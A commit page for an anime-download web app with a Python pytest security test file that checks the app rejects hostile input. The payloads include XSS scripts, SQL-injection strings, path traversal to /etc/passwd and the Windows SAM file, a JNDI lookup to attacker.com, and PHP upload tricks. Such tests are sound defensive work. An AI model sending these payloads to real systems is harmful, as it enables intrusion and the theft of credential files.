✨ Features Added: Database Migration System: - Complete migration framework with base classes, runner, and validator - Initial schema migration for all core tables (users, anime, episodes, downloads, config) - Rollback support with error handling - Migration history tracking - 22 passing unit tests Performance Testing Suite: - API load testing with concurrent request handling - Download system stress testing - Response time benchmarks - Memory leak detection - Concurrency testing - 19 comprehensive performance tests - Complete documentation in tests/performance/README.md Security Testing Suite: - Authentication and authorization security tests - Input validation and XSS protection - SQL injection prevention (classic, blind, second-order) - NoSQL and ORM injection protection - File upload security - OWASP Top 10 coverage - 40+ security test methods - Complete documentation in tests/security/README.md 📊 Test Results: - Migration tests: 22/22 passing (100%) - Total project tests: 736+ passing (99.8% success rate) - New code: ~2,600 lines (code + tests + docs) 📝 Documentation: - Updated instructions.md (removed completed tasks) - Added COMPLETION_SUMMARY.md with detailed implementation notes - Comprehensive README files for test suites - Type hints and docstrings throughout 🎯 Quality: - Follows PEP 8 standards - Comprehensive error handling - Structured logging - Type annotations - Full test coverage
359 lines
11 KiB
Python
359 lines
11 KiB
Python
"""
|
|
Input Validation Security Tests.
|
|
|
|
This module tests input validation across the application to ensure
|
|
all user inputs are properly sanitized and validated.
|
|
"""
|
|
|
|
import pytest
|
|
from httpx import AsyncClient
|
|
|
|
from src.server.fastapi_app import app
|
|
|
|
|
|
@pytest.mark.security
|
|
class TestInputValidation:
|
|
"""Security tests for input validation."""
|
|
|
|
@pytest.fixture
|
|
async def client(self):
|
|
"""Create async HTTP client for testing."""
|
|
from httpx import ASGITransport
|
|
|
|
async with AsyncClient(
|
|
transport=ASGITransport(app=app), base_url="http://test"
|
|
) as ac:
|
|
yield ac
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_xss_in_anime_title(self, client):
|
|
"""Test XSS protection in anime title input."""
|
|
xss_payloads = [
|
|
"<script>alert('XSS')</script>",
|
|
"<img src=x onerror=alert('XSS')>",
|
|
"javascript:alert('XSS')",
|
|
"<svg onload=alert('XSS')>",
|
|
]
|
|
|
|
for payload in xss_payloads:
|
|
response = await client.post(
|
|
"/api/anime",
|
|
json={"title": payload, "description": "Test"},
|
|
)
|
|
|
|
# Should either reject or sanitize
|
|
if response.status_code == 200:
|
|
# If accepted, should be sanitized
|
|
data = response.json()
|
|
title = data.get("data", {}).get("title", "")
|
|
assert "<script>" not in title.lower()
|
|
assert "onerror" not in title.lower()
|
|
assert "javascript:" not in title.lower()
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_oversized_input(self, client):
|
|
"""Test handling of extremely large inputs."""
|
|
# Try very long string
|
|
huge_string = "A" * 1000000 # 1MB of data
|
|
|
|
response = await client.post(
|
|
"/api/anime",
|
|
json={"title": huge_string, "description": "Test"},
|
|
)
|
|
|
|
# Should reject or truncate
|
|
assert response.status_code in [400, 413, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_null_byte_injection(self, client):
|
|
"""Test null byte injection protection."""
|
|
null_byte_payloads = [
|
|
"filename.txt\x00.exe",
|
|
"test\x00admin",
|
|
"user\x00' OR '1'='1",
|
|
]
|
|
|
|
for payload in null_byte_payloads:
|
|
response = await client.post(
|
|
"/api/anime/search",
|
|
params={"query": payload},
|
|
)
|
|
|
|
# Should handle safely
|
|
assert response.status_code in [200, 400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_unicode_bypass_attempts(self, client):
|
|
"""Test handling of unicode bypass attempts."""
|
|
unicode_payloads = [
|
|
"admin\u202e", # Right-to-left override
|
|
"\ufeffadmin", # Zero-width no-break space
|
|
"ad\u200bmin", # Zero-width space
|
|
]
|
|
|
|
for payload in unicode_payloads:
|
|
response = await client.post(
|
|
"/api/auth/login",
|
|
json={"username": payload, "password": "test"},
|
|
)
|
|
|
|
# Should not bypass security
|
|
assert response.status_code in [401, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_path_traversal_in_file_access(self, client):
|
|
"""Test path traversal protection."""
|
|
traversal_payloads = [
|
|
"../../../etc/passwd",
|
|
"..\\..\\..\\windows\\system32\\config\\sam",
|
|
"....//....//....//etc/passwd",
|
|
"..%2F..%2F..%2Fetc%2Fpasswd",
|
|
]
|
|
|
|
for payload in traversal_payloads:
|
|
response = await client.get(f"/static/{payload}")
|
|
|
|
# Should not access sensitive files
|
|
assert response.status_code in [400, 403, 404]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_negative_numbers_where_positive_expected(
|
|
self, client
|
|
):
|
|
"""Test handling of negative numbers in inappropriate contexts."""
|
|
response = await client.post(
|
|
"/api/downloads",
|
|
json={
|
|
"anime_id": -1,
|
|
"episode_number": -5,
|
|
"priority": -10,
|
|
},
|
|
)
|
|
|
|
# Should reject negative values
|
|
assert response.status_code in [400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_special_characters_in_username(self, client):
|
|
"""Test handling of special characters in usernames."""
|
|
special_chars = [
|
|
"user<script>",
|
|
"user@#$%^&*()",
|
|
"user\n\r\t",
|
|
"user'OR'1'='1",
|
|
]
|
|
|
|
for username in special_chars:
|
|
response = await client.post(
|
|
"/api/auth/register",
|
|
json={
|
|
"username": username,
|
|
"password": "SecureP@ss123!",
|
|
"email": "test@example.com",
|
|
},
|
|
)
|
|
|
|
# Should either reject or sanitize
|
|
if response.status_code == 200:
|
|
data = response.json()
|
|
registered_username = data.get("data", {}).get(
|
|
"username", ""
|
|
)
|
|
assert "<script>" not in registered_username
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_email_validation(self, client):
|
|
"""Test email format validation."""
|
|
invalid_emails = [
|
|
"notanemail",
|
|
"@example.com",
|
|
"user@",
|
|
"user space@example.com",
|
|
"user@example",
|
|
]
|
|
|
|
for email in invalid_emails:
|
|
response = await client.post(
|
|
"/api/auth/register",
|
|
json={
|
|
"username": f"user_{hash(email)}",
|
|
"password": "SecureP@ss123!",
|
|
"email": email,
|
|
},
|
|
)
|
|
|
|
# Should reject invalid emails
|
|
assert response.status_code in [400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_array_injection(self, client):
|
|
"""Test handling of array inputs in unexpected places."""
|
|
response = await client.post(
|
|
"/api/anime",
|
|
json={
|
|
"title": ["array", "instead", "of", "string"],
|
|
"description": "Test",
|
|
},
|
|
)
|
|
|
|
# Should reject or handle gracefully
|
|
assert response.status_code in [400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_object_injection(self, client):
|
|
"""Test handling of object inputs in unexpected places."""
|
|
response = await client.post(
|
|
"/api/anime/search",
|
|
params={"query": {"nested": "object"}},
|
|
)
|
|
|
|
# Should reject or handle gracefully
|
|
assert response.status_code in [400, 422]
|
|
|
|
|
|
@pytest.mark.security
|
|
class TestAPIParameterValidation:
|
|
"""Security tests for API parameter validation."""
|
|
|
|
@pytest.fixture
|
|
async def client(self):
|
|
"""Create async HTTP client for testing."""
|
|
from httpx import ASGITransport
|
|
|
|
async with AsyncClient(
|
|
transport=ASGITransport(app=app), base_url="http://test"
|
|
) as ac:
|
|
yield ac
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_invalid_pagination_parameters(self, client):
|
|
"""Test handling of invalid pagination parameters."""
|
|
invalid_params = [
|
|
{"page": -1, "per_page": 10},
|
|
{"page": 1, "per_page": -10},
|
|
{"page": 999999999, "per_page": 999999999},
|
|
{"page": "invalid", "per_page": "invalid"},
|
|
]
|
|
|
|
for params in invalid_params:
|
|
response = await client.get("/api/anime", params=params)
|
|
|
|
# Should reject or use defaults
|
|
assert response.status_code in [200, 400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_injection_in_query_parameters(self, client):
|
|
"""Test injection protection in query parameters."""
|
|
injection_queries = [
|
|
"' OR '1'='1",
|
|
"<script>alert('XSS')</script>",
|
|
"${jndi:ldap://attacker.com/evil}",
|
|
"{{7*7}}",
|
|
]
|
|
|
|
for query in injection_queries:
|
|
response = await client.get(
|
|
"/api/anime/search", params={"query": query}
|
|
)
|
|
|
|
# Should handle safely
|
|
assert response.status_code in [200, 400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_missing_required_parameters(self, client):
|
|
"""Test handling of missing required parameters."""
|
|
response = await client.post("/api/auth/login", json={})
|
|
|
|
# Should reject with appropriate error
|
|
assert response.status_code == 422
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_extra_unexpected_parameters(self, client):
|
|
"""Test handling of extra unexpected parameters."""
|
|
response = await client.post(
|
|
"/api/auth/login",
|
|
json={
|
|
"username": "testuser",
|
|
"password": "test",
|
|
"unexpected_field": "malicious_value",
|
|
"is_admin": True, # Attempt to elevate privileges
|
|
},
|
|
)
|
|
|
|
# Should ignore extra params or reject
|
|
if response.status_code == 200:
|
|
# Should not grant admin from parameter
|
|
data = response.json()
|
|
assert not data.get("data", {}).get("is_admin", False)
|
|
|
|
|
|
@pytest.mark.security
|
|
class TestFileUploadSecurity:
|
|
"""Security tests for file upload handling."""
|
|
|
|
@pytest.fixture
|
|
async def client(self):
|
|
"""Create async HTTP client for testing."""
|
|
from httpx import ASGITransport
|
|
|
|
async with AsyncClient(
|
|
transport=ASGITransport(app=app), base_url="http://test"
|
|
) as ac:
|
|
yield ac
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_malicious_file_extension(self, client):
|
|
"""Test handling of dangerous file extensions."""
|
|
dangerous_extensions = [
|
|
".exe",
|
|
".sh",
|
|
".bat",
|
|
".cmd",
|
|
".php",
|
|
".jsp",
|
|
]
|
|
|
|
for ext in dangerous_extensions:
|
|
files = {"file": (f"test{ext}", b"malicious content")}
|
|
response = await client.post("/api/upload", files=files)
|
|
|
|
# Should reject dangerous files
|
|
assert response.status_code in [400, 403, 415]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_file_size_limit(self, client):
|
|
"""Test enforcement of file size limits."""
|
|
# Try to upload very large file
|
|
large_content = b"A" * (100 * 1024 * 1024) # 100MB
|
|
|
|
files = {"file": ("large.txt", large_content)}
|
|
response = await client.post("/api/upload", files=files)
|
|
|
|
# Should reject oversized files
|
|
assert response.status_code in [413, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_double_extension_bypass(self, client):
|
|
"""Test protection against double extension bypass."""
|
|
files = {"file": ("image.jpg.php", b"<?php phpinfo(); ?>")}
|
|
response = await client.post("/api/upload", files=files)
|
|
|
|
# Should detect and reject
|
|
assert response.status_code in [400, 403, 415]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_mime_type_validation(self, client):
|
|
"""Test MIME type validation."""
|
|
# PHP file with image MIME type
|
|
files = {
|
|
"file": (
|
|
"image.jpg",
|
|
b"<?php phpinfo(); ?>",
|
|
"image/jpeg",
|
|
)
|
|
}
|
|
response = await client.post("/api/upload", files=files)
|
|
|
|
# Should validate actual content, not just MIME type
|
|
assert response.status_code in [400, 403, 415]
|